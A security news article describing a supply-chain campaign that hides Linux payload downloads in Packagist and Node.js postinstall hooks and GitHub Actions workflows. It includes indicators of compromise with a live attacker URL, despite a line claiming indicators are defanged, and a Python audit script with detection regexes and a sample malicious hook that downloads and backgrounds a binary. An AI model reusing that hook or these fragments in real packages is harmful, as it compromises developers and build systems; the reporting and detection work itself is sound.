Hackers Hide Linux Payload During Package Install via

Jennifer sherman
May 25, 2026 4 Min Read

A novel supply chain attack campaign is actively targeting developers, leveraging a stealthy method many wouldn’t anticipate: malicious postinstall hooks. Security researchers at Hidden inside software packages on GitHub, a malicious script downloads a Linux binary during installation and disguises it using a filename designed to look like a standard system process. The attack has now touched more than 700 repositories across multiple ecosystems.

The campaign works by planting a harmful postinstall script inside PHP and Node.js packages. When a developer installs an affected package, the script runs automatically without any visible warning.

It reaches out to an attacker-controlled GitHub account, pulls down a binary file, and saves it to a temporary folder on the victim’s Linux system under the name /tmp/.sshd, a path that mimics a legitimate SSH daemon file used by the operating system.

Researchers at Socket.dev said in a report shared with Cyber Security News (CSN) that they identified this campaign while investigating a set of flagged Packagist packages.

Their AI-powered scanner picked up on the suspicious install-time behavior, flagging packages as malicious based on how they handled binary downloads and background execution. The findings revealed a campaign far broader than the initial batch suggested.

The attack spreads across both Packagist and Node.js project repositories on GitHub. Investigators found that a GitHub account named parikhrpreksha served as the central delivery point for the payload.

The same postinstall command appeared consistently across hundreds of repositories, all pulling the same binary from the same GitHub Releases URL, pointing to a coordinated supply chain operation.

What makes this attack hard to catch is how effectively it hides its activity. The script suppresses error messages that might appear during installation and runs the downloaded binary silently in the background.

Developers reviewing standard install logs would see nothing unusual, and the file disguised under a name resembling an SSH process would blend into the system with little chance of standing out.

Payload Hidden Behind an SSH-Like Filename

The core of this attack hinges on a simple but effective disguise. The malicious script downloads a binary named fvbs.network from the attacker’s GitHub Releases page and writes it to /tmp/.sshd on the infected machine.

The dot prefix in the filename hides the file in most standard directory listings, while the .sshd naming makes it appear to be a trusted system service.

Packages (Source: Socket.dev)

Once written, the binary is made executable using chmod +x and launched in the background, cutting off any visible connection to the install process. The script uses curl with TLS verification disabled, meaning it does not check whether the remote source is legitimate.

By the time the install command finishes, the payload is already running quietly on the developer’s machine. Socket’s investigation also confirmed that malicious commits were pushed directly into upstream GitHub repositories.

Branch-tracking versions such as dev-main, dev-master, and dev were used, meaning any Packagist package pointing to those branches would automatically pull in the infected code on the next update. Simply removing the affected package version was not enough, since the upstream repository itself needed to be fixed first.

Malicious Hooks Spread Across Packagist and Node.js

The confirmed Packagist packages all carried identical postinstall hooks pointing to the same attacker-controlled GitHub account.

In several Node.js repositories, the same payload delivery command was found inside GitHub Actions workflow files, positioning it to run during CI/CD pipeline execution rather than just local developer installs.

Malicious Commits in Upstream GitHub Repositories (Source: Socket.dev)

This dual-vector approach means the attack could reach both individual developers and automated build environments.

In at least one case, the payload command was embedded inside a workflow file using a dependency named dependency_cache_sync, broadening the exposure beyond what simple package scanning would catch.

Socket reported all affected packages to Packagist, which removed them promptly. However, the branch-tracking nature of many affected packages means developers should also verify that upstream repositories have been cleaned.

Teams using Packagist packages with PHP scripting or Laravel-based tooling should inspect composer.json files for unexpected postinstall entries.

Socket recommends checking for any binary written to /tmp with a dot-prefixed name, reviewing GitHub Actions workflow files for unfamiliar steps, and auditing packages that track development branches rather than fixed release tags.
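One way to act on these recommendations in a manifest audit, as an added example that is not part of the original report or of Socket's tooling: the script below parses a composer.json or package.json body, checks install-time lifecycle hooks for the traits described above (curl with TLS verification disabled, a dot-prefixed file under /tmp, chmod +x, suppressed errors, backgrounded execution), and flags Composer constraints that track a branch instead of a release tag. The regexes, hook names and the sample manifest are constructed for illustration; the URL in the sample is a placeholder.

```python
import json
import re

# Constructed regexes for the traits of the reported hook: curl with TLS checks
# disabled, a dot-prefixed file under /tmp, chmod +x, silenced errors, and a
# lone "&" that backgrounds the payload (2>&1 and && are not matched).
SUSPICIOUS_PATTERNS = {
    "curl_tls_disabled": re.compile(r"\bcurl\b.*?(?:\s-[a-zA-Z]*k\b|\s--insecure\b)"),
    "hidden_tmp_file": re.compile(r"/tmp/\.[^\s;&|'\"]+"),
    "chmod_exec": re.compile(r"\bchmod\s+\+x\b"),
    "output_suppressed": re.compile(r">\s*/dev/null"),
    "background_exec": re.compile(r"(?<![&>])&(?!&)"),
}
# Lifecycle hooks Composer and npm run automatically during install/update.
INSTALL_HOOKS = {"pre-install-cmd", "post-install-cmd", "pre-update-cmd",
                 "post-update-cmd", "preinstall", "install", "postinstall", "prepare"}

def _hook_commands(manifest):
    for hook, cmds in (manifest.get("scripts") or {}).items():
        if hook in INSTALL_HOOKS:
            for cmd in (cmds if isinstance(cmds, list) else [cmds]):
                yield hook, str(cmd)

def audit_manifest(text):
    """Return (kind, detail) findings for a composer.json or package.json body."""
    manifest = json.loads(text)
    findings = []
    for hook, cmd in _hook_commands(manifest):
        hits = [name for name, rx in SUSPICIOUS_PATTERNS.items() if rx.search(cmd)]
        if hits:
            findings.append(("suspicious_hook", f"{hook}: {', '.join(hits)}"))
    # Composer constraints that track a branch (dev-main, dev-master, dev, 1.x-dev)
    # pull whatever is on the branch at the next update instead of a fixed tag.
    for section in ("require", "require-dev"):
        for pkg, ver in (manifest.get(section) or {}).items():
            if ver == "dev" or ver.startswith("dev-") or ver.endswith("-dev"):
                findings.append(("branch_tracking", f"{pkg}: {ver}"))
    return findings

# Constructed composer.json mirroring the reported hook; the URL is a placeholder.
SAMPLE_COMPOSER = json.dumps({
    "require": {"vendor/helper": "dev-main", "vendor/lib": "^2.1"},
    "scripts": {"post-install-cmd": [
        "curl -sk https://example.invalid/payload -o /tmp/.sshd 2>/dev/null; "
        "chmod +x /tmp/.sshd; /tmp/.sshd &"]},
})

if __name__ == "__main__":
    for kind, detail in audit_manifest(SAMPLE_COMPOSER):
        print(f"[{kind}] {detail}")
```

Run it over every composer.json and package.json in a checkout; GitHub Actions workflow files need a separate pass, since the same command was also found in YAML steps rather than manifest hooks.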

Indicators of Compromise (IoCs):

Type Indicator Description
GitHub Account parikhrpreksha Attacker-controlled GitHub account used as payload delivery infrastructure
URL https://github.com/parikhrpreksha/system_network_helper_aacf/releases/latest/download/fvbs.network Direct download URL for the malicious Linux binary
File Name fvbs.network Malicious Linux binary downloaded during package installation
File Path /tmp/.sshd Location where the malicious binary is written on the victim machine, disguised as an SSH daemon file
Command Fragment curl -sk Used to silently download the payload with TLS verification disabled
Command Fragment chmod +x Used to make the downloaded binary executable before background execution
Command Fragment /tmp/.sshd & Execution pattern used to launch the payload silently in the background
Dependency Name dependency_cache_sync Malicious dependency name embedded in GitHub Actions workflow files

Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.

Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.
